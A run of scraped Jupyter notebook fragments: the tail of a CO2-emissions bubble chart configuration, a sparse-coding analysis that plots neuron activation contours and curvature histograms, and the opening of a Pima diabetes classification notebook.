0.60536,
0.987559,
38.28806,
36.087837,
14.487844,
0.298477,
0.658329,
634.934068,
1.539884,
269.654254,
22.973233,
22.372399,
2.551817,
41.766183,
36.895485,
25.877689,
273.104667,
7.473265,
11.501889,
292.452995,
0.520422,
3.167303,
0.164545,
37.865571,
30.357093,
419.194747,
78.034724,
0.01148,
5.384767,
231.694165,
188.541366,
380.138559,
5424.881502,
6.251839,
113.93837,
0.145412,
129.596274,
211.774129,
9.945288,
6.930094,
11.340575
]
]
},
"x": {
"Country": [
"Afghanistan",
"Albania",
"Algeria",
"Andorra",
"Angola",
"Anguilla",
"Antigua and Barbuda",
"Argentina",
"Armenia",
"Aruba",
"Australia",
"Austria",
"Azerbaijan",
"Bahamas",
"Bahrain",
"Bangladesh",
"Barbados",
"Belarus",
"Belgium",
"Belize",
"Benin",
"Bermuda",
"Bhutan",
"Bolivia",
"Bosnia and Herzegovina",
"Botswana",
"Brazil",
"British Virgin Islands",
"Brunei",
"Bulgaria",
"Burkina Faso",
"Burundi",
"Cambodia",
"Cameroon",
"Canada",
"Cape Verde",
"Central African Republic",
"Chad",
"Chile",
"China",
"Colombia",
"Comoros",
"Congo",
"Cook Islands",
"Costa Rica",
"Croatia",
"Cuba",
"Cyprus",
"Czechia",
"Democratic Republic of Congo",
"Denmark",
"Djibouti",
"Dominican Republic",
"Ecuador",
"Egypt",
"El Salvador",
"Equatorial Guinea",
"Eritrea",
"Estonia",
"Ethiopia",
"Fiji",
"Finland",
"France",
"French Polynesia",
"Gabon",
"Gambia",
"Georgia",
"Germany",
"Ghana",
"Greece",
"Greenland",
"Grenada",
"Guatemala",
"Guinea",
"Guinea-Bissau",
"Guyana",
"Haiti",
"Honduras",
"Hong Kong",
"Hungary",
"Iceland",
"India",
"Indonesia",
"Iran",
"Iraq",
"Ireland",
"Israel",
"Italy",
"Jamaica",
"Japan",
"Jordan",
"Kazakhstan",
"Kenya",
"Kiribati",
"Kuwait",
"Kyrgyzstan",
"Laos",
"Latvia",
"Lebanon",
"Lesotho",
"Liberia",
"Libya",
"Liechtenstein",
"Lithuania",
"Luxembourg",
"Macao",
"Madagascar",
"Malawi",
"Malaysia",
"Maldives",
"Mali",
"Malta",
"Marshall Islands",
"Mauritania",
"Mauritius",
"Mexico",
"Moldova",
"Mongolia",
"Montenegro",
"Morocco",
"Mozambique",
"Myanmar",
"Namibia",
"Nauru",
"Nepal",
"Netherlands",
"New Caledonia",
"New Zealand",
"Nicaragua",
"Niger",
"Nigeria",
"Niue",
"North Korea",
"North Macedonia",
"Norway",
"Oman",
"Pakistan",
"Panama",
"Papua New Guinea",
"Paraguay",
"Peru",
"Philippines",
"Poland",
"Portugal",
"Qatar",
"Romania",
"Russia",
"Rwanda",
"Saint Helena",
"Saint Kitts and Nevis",
"Saint Lucia",
"Saint Pierre and Miquelon",
"Saint Vincent and the Grenadines",
"Samoa",
"Sao Tome and Principe",
"Saudi Arabia",
"Serbia",
"Seychelles",
"Sierra Leone",
"Singapore",
"Slovakia",
"Slovenia",
"Solomon Islands",
"Somalia",
"South Korea",
"South Sudan",
"Spain",
"Sri Lanka",
"Sudan",
"Suriname",
"Sweden",
"Switzerland",
"Syria",
"Taiwan",
"Tajikistan",
"Tanzania",
"Thailand",
"Timor",
"Togo",
"Tonga",
"Trinidad and Tobago",
"Tunisia",
"Turkey",
"Turkmenistan",
"Tuvalu",
"Uganda",
"Ukraine",
"United Arab Emirates",
"United Kingdom",
"United States",
"Uruguay",
"Uzbekistan",
"Vanuatu",
"Venezuela",
"Vietnam",
"Yemen",
"Zambia",
"Zimbabwe"
],
"Continent": [
"Asia",
"Europe",
"Africa",
"Europe",
"Africa",
"North America",
"North America",
"South America",
"Asia",
"North America",
"Oceania",
"Europe",
"Europe",
"North America",
"Asia",
"Asia",
"North America",
"Europe",
"Europe",
"North America",
"Africa",
"North America",
"Asia",
"South America",
"Europe",
"Africa",
"South America",
"North America",
"Asia",
"Europe",
"Africa",
"Africa",
"Asia",
"Africa",
"North America",
"Africa",
"Africa",
"Africa",
"South America",
"Asia",
"South America",
"Africa",
"Africa",
"Oceania",
"Central America",
"Europe",
"North America",
"Europe",
"Europe",
"Africa",
"Europe",
"Africa",
"North America",
"South America",
"Africa",
"Central America",
"Africa",
"Africa",
"Europe",
"Africa",
"Oceania",
"Europe",
"Europe",
"Oceania",
"Africa",
"Africa",
"Asia",
"Europe",
"Africa",
"Europe",
"North America",
"North America",
"Central America",
"Africa",
"Africa",
"South America",
"North America",
"Central America",
"Asia",
"Europe",
"Europe",
"Asia",
"Asia",
"Asia",
"Asia",
"Europe",
"Asia",
"Europe",
"North America",
"Asia",
"Asia",
"Asia",
"Africa",
"Oceania",
"Asia",
"Asia",
"Asia",
"Europe",
"Asia",
"Africa",
"Africa",
"Africa",
"Europe",
"Europe",
"Europe",
"Asia",
"Africa",
"Africa",
"Asia",
"Asia",
"Africa",
"Europe",
"Oceania",
"Africa",
"Africa",
"North America",
"Europe",
"Asia",
"Europe",
"Africa",
"Africa",
"Asia",
"Africa",
"Oceania",
"Asia",
"Europe",
"Oceania",
"Oceania",
"Central America",
"Africa",
"Africa",
"Oceania",
"Asia",
"Europe",
"Europe",
"Asia",
"Asia",
"Central America",
"Oceania",
"South America",
"South America",
"Asia",
"Europe",
"Europe",
"Africa",
"Europe",
"Asia",
"Africa",
"Africa",
"North America",
"North America",
"North America",
"North America",
"Oceania",
"Africa",
"Asia",
"Europe",
"Africa",
"Africa",
"Asia",
"Europe",
"Europe",
"Oceania",
"Africa",
"Asia",
"Africa",
"Europe",
"Asia",
"Africa",
"South America",
"Europe",
"Europe",
"Asia",
"Asia",
"Asia",
"Africa",
"Asia",
"Asia",
"Africa",
"Oceania",
"North America",
"Africa",
"Asia",
"Asia",
"Oceania",
"Africa",
"Europe",
"Asia",
"Europe",
"North America",
"South America",
"Asia",
"Oceania",
"South America",
"Asia",
"Asia",
"Africa",
"Africa"
]
}
},
config={
"circularType": "bubble",
"colorBy": "Continent",
"graphType": "Circular",
"hierarchy": [
"Continent",
"Country"
],
"theme": "paulTol",
"title": "Annual CO2 Emmisions in 2018"
},
width=613,
height=613,
events=CXEvents(),
after_render=[],
other_init_params={
"version": 35,
"events": False,
"info": False,
"afterRenderInit": False,
"noValidate": True
}
)
display = CXNoteBook(cx)
display.render(output_file="bubble_4.html")
```
|
github_jupyter
|
## Imports
```
import os
import sys
%env CUDA_VISIBLE_DEVICES=0
%matplotlib inline
import pickle
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from matplotlib.ticker import FormatStrFormatter
import tensorflow as tf
root_path = os.path.dirname(os.path.dirname(os.path.dirname(os.getcwd())))
if root_path not in sys.path: sys.path.append(root_path)
from DeepSparseCoding.tf1x.data.dataset import Dataset
import DeepSparseCoding.tf1x.data.data_selector as ds
import DeepSparseCoding.tf1x.utils.data_processing as dp
import DeepSparseCoding.tf1x.utils.plot_functions as pf
import DeepSparseCoding.tf1x.analysis.analysis_picker as ap
class lambda_params(object):
def __init__(self, lamb=None):
self.model_type = "lambda"
self.model_name = "lambda_mnist"
self.version = "0.0"
self.save_info = "analysis_test_carlini_targeted"
self.overwrite_analysis_log = False
self.activation_function = lamb
class mlp_params(object):
def __init__(self):
self.model_type = "mlp"
self.model_name = "mlp_mnist"
self.version = "0.0"
self.save_info = "analysis_test_carlini_targeted"
self.overwrite_analysis_log = False
class lca_512_params(object):
def __init__(self):
self.model_type = "lca"
self.model_name = "lca_512_vh"
self.version = "0.0"
self.save_info = "analysis_train_carlini_targeted"
self.overwrite_analysis_log = False
class lca_768_params(object):
def __init__(self):
self.model_type = "lca"
self.model_name = "lca_768_mnist"
self.version = "0.0"
#self.save_info = "analysis_train_carlini_targeted" # for vh
self.save_info = "analysis_test_carlini_targeted" # for mnist
self.overwrite_analysis_log = False
class lca_1024_params(object):
def __init__(self):
self.model_type = "lca"
self.model_name = "lca_1024_vh"
self.version = "0.0"
self.save_info = "analysis_train_carlini_targeted"
self.overwrite_analysis_log = False
class lca_1536_params(object):
def __init__(self):
self.model_type = "lca"
self.model_name = "lca_1536_mnist"
self.version = "0.0"
self.save_info = "analysis_test_carlini_targeted"
self.overwrite_analysis_log = False
class ae_deep_params(object):
def __init__(self):
self.model_type = "ae"
self.model_name = "ae_deep_mnist"
self.version = "0.0"
self.save_info = "analysis_test_carlini_targeted"
self.overwrite_analysis_log = False
lamb = lambda x : tf.reduce_sum(tf.square(x), axis=1, keepdims=True)
#lamb = lambda x : x / tf.reduce_sum(tf.square(x), axis=1, keepdims=True)
params_list = [ae_deep_params()]#lca_768_params(), lca_1536_params()]
for params in params_list:
params.model_dir = (os.path.expanduser("~")+"/Work/Projects/"+params.model_name)
analyzer_list = [ap.get_analyzer(params.model_type) for params in params_list]
for analyzer, params in zip(analyzer_list, params_list):
analyzer.setup(params)
if(hasattr(params, "activation_function")):
analyzer.model_params.activation_function = params.activation_function
analyzer.setup_model(analyzer.model_params)
analyzer.load_analysis(save_info=params.save_info)
analyzer.model_name = params.model_name
for analyzer in analyzer_list:
if(analyzer.analysis_params.model_type.lower() != "lca"
and analyzer.analysis_params.model_type.lower() != "lambda"):
pre_images = np.stack([analyzer.neuron_vis_output["optimal_stims"][target_id][-1].reshape(28,28)
for target_id in range(len(analyzer.analysis_params.neuron_vis_targets))], axis=0)
pre_image_fig = pf.plot_weights(pre_images, title=analyzer.model_name+" pre-images", figsize=(4,8))
pre_image_fig.savefig(analyzer.analysis_out_dir+"/vis/pre_images.png", transparent=True,
bbox_inches="tight", pad_inches=0.01)
#available_indices = [ 30, 45, 101, 223, 283, 335, 388, 491, 558, 571, 572,
# 590, 599, 606, 619, 629, 641, 652, 693, 722, 724, 749,
# 769, 787, 812, 819, 824, 906, 914, 927, 987, 1134, 1186,
# 1196, 1297, 1376, 1409, 1534]
#available_indices = np.array(range(analyzer.model.get_num_latent()))
available_indices = [2, 6, 8, 18, 21, 26]
step_idx = -1
for analyzer in analyzer_list:
analyzer.available_indices = available_indices#np.array(range(analyzer.model.get_num_latent()))
analyzer.target_neuron_idx = analyzer.available_indices[0]
if(analyzer.analysis_params.model_type.lower() == "lca"):
bf0 = analyzer.bf_stats["basis_functions"][analyzer.target_neuron_idx]
else:
bf0 = analyzer.neuron_vis_output["optimal_stims"][analyzer.target_neuron_idx][step_idx]
bf0 = bf0.reshape(np.prod(analyzer.model.get_input_shape()[1:]))
bf0 = bf0 / np.linalg.norm(bf0)
fig, axes = plt.subplots(1, 2, figsize=(10,4))
ax = pf.clear_axis(axes[0])
ax.imshow(bf0.reshape(int(np.sqrt(bf0.size)), int(np.sqrt(bf0.size))), cmap="Greys_r")#, vmin=0.0, vmax=1.0)
ax.set_title("Optimal\ninput image")
if(analyzer.analysis_params.model_type.lower() != "lca"):
axes[1].plot(analyzer.neuron_vis_output["loss"][analyzer.target_neuron_idx])
axes[1].set_title("Optimization loss")
plt.show()
def find_orth_vect(matrix):
rand_vect = np.random.rand(matrix.shape[0], 1)
new_matrix = np.hstack((matrix, rand_vect))
candidate_vect = np.zeros(matrix.shape[1]+1)
candidate_vect[-1] = 1
orth_vect = np.linalg.lstsq(new_matrix.T, candidate_vect, rcond=None)[0] # [0] indexes lst-sqrs solution
orth_vect = np.squeeze((orth_vect / np.linalg.norm(orth_vect)).T)
return orth_vect
def get_rand_vectors(bf0, num_orth_directions):
rand_vectors = bf0.T[:,None] # matrix of alternate vectors
for orth_idx in range(num_orth_directions):
tmp_bf1 = find_orth_vect(rand_vectors)
rand_vectors = np.append(rand_vectors, tmp_bf1[:,None], axis=1)
return rand_vectors.T[1:, :] # [num_vectors, vector_length]
def get_alt_vectors(bf0, bf1s):
alt_vectors = bf0.T[:,None] # matrix of alternate vectors
for tmp_bf1 in bf1s:
tmp_bf1 = np.squeeze((tmp_bf1 / np.linalg.norm(tmp_bf1)).T)
alt_vectors = np.append(alt_vectors, tmp_bf1[:,None], axis=1)
return alt_vectors.T[1:, :] # [num_vectors, vector_length]
def get_norm_activity(analyzer, neuron_id_list, stim0_list, stim1_list, num_imgs):
# Construct point dataset
#x_pts = np.linspace(-0.5, 19.5, int(np.sqrt(num_imgs)))
#y_pts = np.linspace(-10.0, 10.0, int(np.sqrt(num_imgs)))
x_pts = np.linspace(-0.5, 3.5, int(np.sqrt(num_imgs)))
y_pts = np.linspace(-2.0, 2.0, int(np.sqrt(num_imgs)))
#x_pts = np.linspace(0.9, 1.1, int(np.sqrt(num_imgs)))
#y_pts = np.linspace(-0.1, 0.1, int(np.sqrt(num_imgs)))
#x_pts = np.linspace(0.999, 1.001, int(np.sqrt(num_imgs)))
#y_pts = np.linspace(-0.001, 0.001, int(np.sqrt(num_imgs)))
X_mesh, Y_mesh = np.meshgrid(x_pts, y_pts)
proj_datapoints = np.stack([X_mesh.reshape(num_imgs), Y_mesh.reshape(num_imgs)], axis=1)
out_dict = {
"norm_activity": [],
"proj_neuron0": [],
"proj_neuron1": [],
"proj_v": [],
"v": [],
"proj_datapoints": proj_datapoints,
"X_mesh": X_mesh,
"Y_mesh": Y_mesh}
# TODO: This can be made to be much faster by compiling all of the stimulus into a single set and computing activations
for neuron_id, stim0 in zip(neuron_id_list, stim0_list):
activity_sub_list = []
proj_neuron0_sub_list = []
proj_neuron1_sub_list = []
proj_v_sub_list = []
v_sub_list = []
for stim1 in stim1_list:
proj_matrix, v = dp.bf_projections(stim0, stim1)
proj_neuron0_sub_list.append(np.dot(proj_matrix, stim0).T) #project
proj_neuron1_sub_list.append(np.dot(proj_matrix, stim1).T) #project
proj_v_sub_list.append(np.dot(proj_matrix, v).T) #project
v_sub_list.append(v)
datapoints = np.stack([np.dot(proj_matrix.T, proj_datapoints[data_id,:])
for data_id in range(num_imgs)], axis=0) #inject
datapoints = dp.reshape_data(datapoints, flatten=False)[0]
datapoints = {"test": Dataset(datapoints, lbls=None, ignore_lbls=None, rand_state=analyzer.rand_state)}
datapoints = analyzer.model.reshape_dataset(datapoints, analyzer.model_params)
activations = analyzer.compute_activations(datapoints["test"].images)#, batch_size=int(np.sqrt(num_imgs)))
activations = activations[:, neuron_id]
activity_max = np.amax(np.abs(activations))
activations = activations / (activity_max + 0.00001)
activations = activations.reshape(int(np.sqrt(num_imgs)), int(np.sqrt(num_imgs)))
activity_sub_list.append(activations)
out_dict["norm_activity"].append(activity_sub_list)
out_dict["proj_neuron0"].append(proj_neuron0_sub_list)
out_dict["proj_neuron1"].append(proj_neuron1_sub_list)
out_dict["proj_v"].append(proj_v_sub_list)
out_dict["v"].append(v_sub_list)
return out_dict
analyzer = analyzer_list[0]
step_idx = -1
num_imgs = int(300**2)#int(228**2)
min_angle = 10
use_rand_orth = False
num_neurons = 2#1
if(use_rand_orth):
target_neuron_indices = np.random.choice(analyzer.available_indices, num_neurons, replace=False)
alt_stim_list = get_rand_vectors(stim0, num_neurons)
else:
if(analyzer.analysis_params.model_type.lower() == "lca"):
target_neuron_indices = np.random.choice(analyzer.available_indices, num_neurons, replace=False)
analyzer.neuron_angles = analyzer.get_neuron_angles(analyzer.bf_stats)[1] * (180/np.pi)
alt_stim_list = []
else:
all_neuron_indices = np.random.choice(analyzer.available_indices, 2*num_neurons, replace=False)
target_neuron_indices = all_neuron_indices[:num_neurons]
orth_neuron_indices = all_neuron_indices[num_neurons:]
if(analyzer.analysis_params.model_type.lower() == "ae"):
neuron_vis_targets = np.array(analyzer.analysis_params.neuron_vis_targets)
neuron_id_list = neuron_vis_targets[target_neuron_indices]
else:
neuron_id_list = target_neuron_indices
stim0_list = []
stimid0_list = []
for neuron_id in target_neuron_indices:
if(analyzer.analysis_params.model_type.lower() == "lca"):
stim0 = analyzer.bf_stats["basis_functions"][neuron_id]
else:
stim0 = analyzer.neuron_vis_output["optimal_stims"][neuron_id][step_idx]
stim0 = stim0.reshape(np.prod(analyzer.model.get_input_shape()[1:])) # shape=[784]
stim0 = stim0 / np.linalg.norm(stim0) # normalize length
stim0_list.append(stim0)
stimid0_list.append(neuron_id)
if not use_rand_orth:
if(analyzer.analysis_params.model_type.lower() == "lca"):
gt_min_angle_indices = np.argwhere(analyzer.neuron_angles[neuron_id, :] > min_angle)
sorted_angle_indices = np.argsort(analyzer.neuron_angles[neuron_id, gt_min_angle_indices], axis=0)
vector_id = gt_min_angle_indices[sorted_angle_indices[0]].item()
alt_stim = analyzer.bf_stats["basis_functions"][vector_id]
alt_stim = [np.squeeze(alt_stim.reshape(analyzer.model_params.num_pixels))]
comparison_vector = get_alt_vectors(stim0, alt_stim)[0]
alt_stim_list.append(comparison_vector)
else:
alt_stims = [analyzer.neuron_vis_output["optimal_stims"][orth_neuron_idx][step_idx]
for orth_neuron_idx in orth_neuron_indices]
alt_stim_list = get_alt_vectors(stim0, alt_stims)
```
```
out_dict = get_norm_activity(analyzer, neuron_id_list, stim0_list, alt_stim_list, num_imgs)
num_plots_y = num_neurons + 1 # extra dimension for example image
num_plots_x = num_neurons + 1 # extra dimension for example image
gs0 = gridspec.GridSpec(num_plots_y, num_plots_x, wspace=0.1, hspace=0.1)
fig = plt.figure(figsize=(10, 10))
cmap = plt.get_cmap('viridis')
orth_vectors = []
for neuron_loop_index in range(num_neurons): # rows
for orth_loop_index in range(num_neurons): # columns
norm_activity = out_dict["norm_activity"][neuron_loop_index][orth_loop_index]
proj_neuron0 = out_dict["proj_neuron0"][neuron_loop_index][orth_loop_index]
proj_neuron1 = out_dict["proj_neuron1"][neuron_loop_index][orth_loop_index]
proj_v = out_dict["proj_v"][neuron_loop_index][orth_loop_index]
orth_vectors.append(out_dict["v"][neuron_loop_index][orth_loop_index])
curve_plot_y_idx = neuron_loop_index + 1
curve_plot_x_idx = orth_loop_index + 1
curve_ax = pf.clear_axis(fig.add_subplot(gs0[curve_plot_y_idx, curve_plot_x_idx]))
# NOTE: each subplot has a renormalized color scale
# TODO: Add scale bar like in the lca inference plots
vmin = np.min(norm_activity)
vmax = np.max(norm_activity)
levels = 5
contsf = curve_ax.contourf(out_dict["X_mesh"], out_dict["Y_mesh"], norm_activity,
levels=levels, vmin=vmin, vmax=vmax, alpha=1.0, antialiased=True, cmap=cmap)
curve_ax.arrow(0, 0, proj_neuron0[0].item(), proj_neuron0[1].item(),
width=0.05, head_width=0.15, head_length=0.15, fc='r', ec='r')
curve_ax.arrow(0, 0, proj_neuron1[0].item(), proj_neuron1[1].item(),
width=0.05, head_width=0.15, head_length=0.15, fc='w', ec='w')
curve_ax.arrow(0, 0, proj_v[0].item(), proj_v[1].item(),
width=0.05, head_width=0.15, head_length=0.15, fc='k', ec='k')
#curve_ax.arrow(0, 0, proj_neuron0[0].item(), proj_neuron0[1].item(),
# width=0.05, head_width=0.15, head_length=0.15, fc='r', ec='r')
#curve_ax.arrow(0, 0, proj_neuron1[0].item(), proj_neuron1[1].item(),
# width=0.005, head_width=0.15, head_length=0.15, fc='w', ec='w')
#curve_ax.arrow(0, 0, proj_v[0].item(), proj_v[1].item(),
# width=0.05, head_width=0.05, head_length=0.15, fc='k', ec='k')
#curve_ax.set_xlim([-0.5, 19.5])
#curve_ax.set_ylim([-10, 10.0])
curve_ax.set_xlim([-0.5, 3.5])
curve_ax.set_ylim([-2, 2.0])
#curve_ax.set_xlim([0.999, 1.001])
#curve_ax.set_ylim([-0.001, 0.001])
for plot_y_id in range(num_plots_y):
for plot_x_id in range(num_plots_x):
if plot_y_id > 0 and plot_x_id == 0:
bf_ax = pf.clear_axis(fig.add_subplot(gs0[plot_y_id, plot_x_id]))
bf_resh = stim0_list[plot_y_id-1].reshape((int(np.sqrt(np.prod(analyzer.model.params.data_shape))),
int(np.sqrt(np.prod(analyzer.model.params.data_shape)))))
bf_ax.imshow(bf_resh, cmap="Greys_r")
if plot_y_id == 1:
bf_ax.set_title("Target vectors", color="r", fontsize=16)
if plot_y_id == 0 and plot_x_id > 0:
#comparison_img = comparison_vectors[plot_x_id-1, :].reshape(int(np.sqrt(np.prod(analyzer.model.params.data_shape))),
# int(np.sqrt(np.prod(analyzer.model.params.data_shape))))
orth_img = orth_vectors[plot_x_id-1].reshape(int(np.sqrt(np.prod(analyzer.model.params.data_shape))),
int(np.sqrt(np.prod(analyzer.model.params.data_shape))))
orth_ax = pf.clear_axis(fig.add_subplot(gs0[plot_y_id, plot_x_id]))
orth_ax.imshow(orth_img, cmap="Greys_r")
if plot_x_id == 1:
#orth_ax.set_ylabel("Orthogonal vectors", color="k", fontsize=16)
orth_ax.set_title("Orthogonal vectors", color="k", fontsize=16)
plt.show()
fig.savefig(analyzer.analysis_out_dir+"/vis/iso_contour_grid_04.png")
```
### Curvature comparisons
```
id_list = [1, 1]#, 3]
for analyzer, list_index in zip(analyzer_list, id_list):
analyzer.bf0 = stim0_list[list_index]
analyzer.bf_id0 = stimid0_list[list_index]
analyzer.bf0_slice_scale = 0.80 # between -1 and 1
"""
* Compute a unit vector that is in the same plane as a given basis function pair (B1,B2) and
is orthogonal to B1, where B1 is the target basis for comparison and B2 is selected from all other bases.
* Construct a line of data points in this plane
* Project the data points into image space, compute activations, plot activations
"""
for analyzer in analyzer_list:
analyzer.pop_num_imgs = 100
#orthogonal_list = [idx for idx in range(analyzer.bf_stats["num_outputs"])]
orthogonal_list = [idx for idx in range(analyzer.bf_stats["num_outputs"]) if idx != analyzer.bf_id0]
analyzer.num_orthogonal = len(orthogonal_list)
pop_x_pts = np.linspace(-2.0, 2.0, int(analyzer.pop_num_imgs))
pop_y_pts = np.linspace(-2.0, 2.0, int(analyzer.pop_num_imgs))
pop_X, pop_Y = np.meshgrid(pop_x_pts, pop_y_pts)
full_pop_proj_datapoints = np.stack([pop_X.reshape(analyzer.pop_num_imgs**2),
pop_Y.reshape(analyzer.pop_num_imgs**2)], axis=1) # construct a grid
# find a location to take a slice
# to avoid having to exactly find a point we use a relative position
x_target = pop_x_pts[int(analyzer.bf0_slice_scale*analyzer.pop_num_imgs)]
slice_indices = np.where(full_pop_proj_datapoints[:,0]==x_target)[0]
analyzer.pop_proj_datapoints = full_pop_proj_datapoints[slice_indices,:] # slice grid
analyzer.pop_datapoints = [None,]*analyzer.num_orthogonal
for pop_idx, tmp_bf_id1 in enumerate(orthogonal_list):
tmp_bf1 = analyzer.bf_stats["basis_functions"][tmp_bf_id1].reshape((analyzer.model_params.num_pixels))
tmp_bf1 /= np.linalg.norm(tmp_bf1)
tmp_proj_matrix, v = analyzer.bf_projections(analyzer.bf0, tmp_bf1)
analyzer.pop_datapoints[pop_idx] = np.dot(analyzer.pop_proj_datapoints, tmp_proj_matrix)#[slice_indices,:]
analyzer.pop_datapoints = np.reshape(np.stack(analyzer.pop_datapoints, axis=0),
[analyzer.num_orthogonal*analyzer.pop_num_imgs, analyzer.model_params.num_pixels])
analyzer.pop_datapoints = dp.reshape_data(analyzer.pop_datapoints, flatten=False)[0]
analyzer.pop_datapoints = {"test": Dataset(analyzer.pop_datapoints, lbls=None,
ignore_lbls=None, rand_state=analyzer.rand_state)}
#analyzer.pop_datapoints = analyzer.model.preprocess_dataset(analyzer.pop_datapoints,
# params={"whiten_data":analyzer.model_params.whiten_data,
# "whiten_method":analyzer.model_params.whiten_method,
# "whiten_batch_size":10})
analyzer.pop_datapoints = analyzer.model.reshape_dataset(analyzer.pop_datapoints, analyzer.model_params)
#analyzer.pop_datapoints["test"].images /= np.max(np.abs(analyzer.pop_datapoints["test"].images))
#analyzer.pop_datapoints["test"].images *= 10#analyzer.analysis_params.input_scale
for analyzer in analyzer_list:
pop_activations = analyzer.compute_activations(analyzer.pop_datapoints["test"].images)[:, analyzer.bf_id0]
pop_activations = pop_activations.reshape([analyzer.num_orthogonal, analyzer.pop_num_imgs])
analyzer.pop_norm_activity = pop_activations / (np.amax(np.abs(pop_activations)) + 0.0001)
"""
* Construct the set of unit-length bases that are orthogonal to B0 (there should be B0.size-1 of them)
* Construct a line of data points in each plane defined by B0 and a given orthogonal basis
* Project the data points into image space, compute activations, plot activations
"""
for analyzer in analyzer_list:
analyzer.rand_pop_num_imgs = 100
analyzer.rand_num_orthogonal = analyzer.bf_stats["num_inputs"]-1
pop_x_pts = np.linspace(-2.0, 2.0, int(analyzer.rand_pop_num_imgs))
pop_y_pts = np.linspace(-2.0, 2.0, int(analyzer.rand_pop_num_imgs))
pop_X, pop_Y = np.meshgrid(pop_x_pts, pop_y_pts)
full_rand_pop_proj_datapoints = np.stack([pop_X.reshape(analyzer.rand_pop_num_imgs**2),
pop_Y.reshape(analyzer.rand_pop_num_imgs**2)], axis=1) # construct a grid
# find a location to take a slice
x_target = pop_x_pts[int(analyzer.bf0_slice_scale*np.sqrt(analyzer.rand_pop_num_imgs))]
slice_indices = np.where(full_rand_pop_proj_datapoints[:,0]==x_target)[0]
analyzer.rand_pop_proj_datapoints = full_rand_pop_proj_datapoints[slice_indices,:] # slice grid
orth_col_matrix = analyzer.bf0.T[:,None]
analyzer.rand_pop_datapoints = [None,]*analyzer.rand_num_orthogonal
for pop_idx in range(analyzer.rand_num_orthogonal):
v = find_orth_vect(orth_col_matrix)
orth_col_matrix = np.append(orth_col_matrix, v[:,None], axis=1)
tmp_proj_matrix = np.stack([analyzer.bf0, v], axis=0)
analyzer.rand_pop_datapoints[pop_idx] = np.dot(analyzer.rand_pop_proj_datapoints,
tmp_proj_matrix)
analyzer.rand_pop_datapoints = np.reshape(np.stack(analyzer.rand_pop_datapoints, axis=0),
[analyzer.rand_num_orthogonal*analyzer.rand_pop_num_imgs, analyzer.model_params.num_pixels])
analyzer.rand_pop_datapoints = dp.reshape_data(analyzer.rand_pop_datapoints, flatten=False)[0]
analyzer.rand_pop_datapoints = {"test": Dataset(analyzer.rand_pop_datapoints, lbls=None,
ignore_lbls=None, rand_state=analyzer.rand_state)}
#analyzer.rand_pop_datapoints = analyzer.model.preprocess_dataset(analyzer.rand_pop_datapoints,
# params={"whiten_data":analyzer.model.params.whiten_data,
# "whiten_method":analyzer.model.params.whiten_method,
# "whiten_batch_size":10})
analyzer.rand_pop_datapoints = analyzer.model.reshape_dataset(analyzer.rand_pop_datapoints,
analyzer.model_params)
#analyzer.rand_pop_datapoints["test"].images /= np.max(np.abs(analyzer.rand_pop_datapoints["test"].images))
#analyzer.rand_pop_datapoints["test"].images *= 10# analyzer.analysis_params.input_scale
for analyzer in analyzer_list:
rand_pop_activations = analyzer.compute_activations(analyzer.rand_pop_datapoints["test"].images)[:,
analyzer.bf_id0]
rand_pop_activations = rand_pop_activations.reshape([analyzer.rand_num_orthogonal, analyzer.rand_pop_num_imgs])
analyzer.rand_pop_norm_activity = rand_pop_activations / (np.amax(np.abs(rand_pop_activations)) + 0.0001)
for analyzer in analyzer_list:
analyzer.bf_coeffs = [
np.polynomial.polynomial.polyfit(analyzer.pop_proj_datapoints[:,1],
analyzer.pop_norm_activity[orthog_idx,:], deg=2)
for orthog_idx in range(analyzer.num_orthogonal)]
analyzer.bf_fits = [
np.polynomial.polynomial.polyval(analyzer.pop_proj_datapoints[:,1], coeff)
for coeff in analyzer.bf_coeffs]
analyzer.bf_curvatures = [np.polyder(fit, m=2) for fit in analyzer.bf_fits]
analyzer.rand_coeffs = [np.polynomial.polynomial.polyfit(analyzer.rand_pop_proj_datapoints[:,1],
analyzer.rand_pop_norm_activity[orthog_idx,:], deg=2)
for orthog_idx in range(analyzer.rand_num_orthogonal)]
analyzer.rand_fits = [np.polynomial.polynomial.polyval(analyzer.rand_pop_proj_datapoints[:,1], coeff)
for coeff in analyzer.rand_coeffs]
analyzer.rand_curvatures = [np.polyder(fit, m=2) for fit in analyzer.rand_fits]
analyzer_idx = 0
bf_curvatures = np.stack(analyzer_list[analyzer_idx].bf_coeffs, axis=0)[:,2]
rand_curvatures = np.stack(analyzer_list[analyzer_idx].rand_coeffs, axis=0)[:,2]
num_bins = 100
bins = np.linspace(-0.2, 0.01, num_bins)
bar_width = np.diff(bins).min()
bf_hist, bin_edges = np.histogram(bf_curvatures.flatten(), bins)
rand_hist, _ = np.histogram(rand_curvatures.flatten(), bins)
bin_left, bin_right = bin_edges[:-1], bin_edges[1:]
bin_centers = bin_left + (bin_right - bin_left)/2
fig, ax = plt.subplots(1, figsize=(16,9))
ax.bar(bin_centers, rand_hist, width=bar_width, log=False, color="g", alpha=0.5, align="center",
label="Random Projection")
ax.bar(bin_centers, bf_hist, width=bar_width, log=False, color="r", alpha=0.5, align="center",
label="BF Projection")
ax.set_xticks(bin_left, minor=True)
ax.set_xticks([bin_left[0], bin_left[int(len(bin_left)/2)], 0.0], minor=False)
ax.xaxis.set_major_formatter(FormatStrFormatter("%0.3f"))
for tick in ax.xaxis.get_major_ticks():
tick.label.set_fontsize(24)
for tick in ax.yaxis.get_major_ticks():
tick.label.set_fontsize(24)
ax.set_title("Histogram of Curvatures", fontsize=32)
ax.set_xlabel("Curvature", fontsize=32)
ax.set_ylabel("Count", fontsize=32)
ax.legend(loc=2, fontsize=32)
fig.savefig(analyzer.analysis_out_dir+"/vis/histogram_of_curvatures_bf0id"+str(analyzer.bf_id0)+".png",
transparent=True, bbox_inches="tight", pad_inches=0.01)
plt.show()
```
|
github_jupyter
|
# Data description & Problem statement:
This dataset is originally from the National Institute of Diabetes and Digestive and Kidney Diseases. The objective of the dataset is to diagnostically predict whether or not a patient has diabetes, based on certain diagnostic measurements included in the dataset. Several constraints were placed on the selection of these instances from a larger database. In particular, all patients here are females at least 21 years old of Pima Indian heritage.
The type of dataset and problem is a classic supervised binary classification. Given a number of elements all with certain characteristics (features), we want to build a machine learning model to identify people affected by type 2 diabetes.
# Workflow:
- Load the dataset, and define the required functions (e.g. for detecting the outliers)
- Data Cleaning/Wrangling: Manipulate outliers, missing data or duplicate values, Encode categorical variables, etc.
